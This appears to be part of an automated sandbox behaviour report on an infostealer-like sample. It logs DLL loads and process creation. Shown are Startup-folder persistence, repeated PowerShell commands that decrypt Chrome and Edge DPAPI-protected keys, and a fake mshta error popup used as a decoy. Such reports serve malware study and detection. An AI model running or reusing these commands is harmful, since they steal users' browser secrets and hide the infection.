Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: jscript9.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mpr.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: scrrun.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: version.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sxs.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textshaping.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msasn1.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: ffmpeg.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: uiautomationcore.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dbghelp.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: version.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dwrite.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: secur32.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: dhcpcsvc.dll |
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe |
Section loaded: propsys.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxgi.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: resourcepolicyclient.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d11.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d11.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxcore.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mf.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfplat.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rtworkq.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msmpeg2vdec.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfperfhelper.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxva2.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msvproc.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d12core.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3d10warp.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxilconv.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: d3dscache.dll |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Source: unknown |
Process created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe "C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe" |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
|
Source: unknown |
Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe" |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
|
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
